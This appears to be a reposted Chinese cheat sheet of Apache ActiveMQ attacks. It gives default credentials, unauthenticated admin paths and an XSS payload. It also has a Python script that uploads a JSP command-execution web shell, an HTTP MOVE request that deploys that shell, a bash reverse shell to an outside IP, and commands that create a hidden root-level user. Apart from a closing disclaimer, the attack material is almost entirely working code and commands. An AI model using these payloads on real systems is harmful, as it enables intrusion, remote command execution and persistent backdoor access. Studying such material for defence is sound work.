ActiveMQ
攻击方式
寻找目标
弱口令
admin/admin
未授权访问
/admin/connections.jsp
源代码泄露
http://www.example.com:8161//admin/index.jsp
http://www.example.com:8161//admin/queues.jsp
http://www.example.com:8161//admin/topics.jsp
XSS漏洞
/admin/queueBrowse/example.A?view=rss&feedType=<script>alert("ACTIVEMQ")</script>
远程代码执行漏洞
import requests
url = "http://192.168.0.11:8161/fileserver/shell2.txt"
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36',
'Cookie':'JSESSIONID=1gfll70wf7hfnbsmipaa6es3b'
}
payload = '''
<%@ page import="java.io.*" %>
<%
out.print("Hello</br>")
String strcmd = request.getParameter("cmd");
String line = null;
Process p = Runtime.getRuntime().exec(strcmd);
BufferedReader br =new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line = br.readLine()) != null) {
out.print(line+"</br>");
}
%>
'''
response = requests.put(url,headers=headers,data=payload)
status = response.status_code
if status == "204":
print "PUT success!"
else:
print "False,please again!"
MOVE /fileserver/shell.txt HTTP/1.1
Destination: file:///opt/activemq/webapps/api/shell.jsp
Host: 192.168.0.11:8161
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 0
反序列化漏洞
http://192.168.0.11:8161/admin/browse.jsp?JMSDestination=event
bash -i >& /dev/tcp/192.168.31.41/8080 0>&1
useradd -g root -s /bin/bash -u 10010 test //添加test用户并将其添加到root组
sed -i "s/test:x:10010/test:x:0/g" /etc/passwd //将passwd中的test的uid修改为0
echo "test:sd123456" | chpasswd //为test用户设置一个密码
体验免费靶场!
本文始发于微信公众号(合天网安实验室):ActiveMQ漏洞总结
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论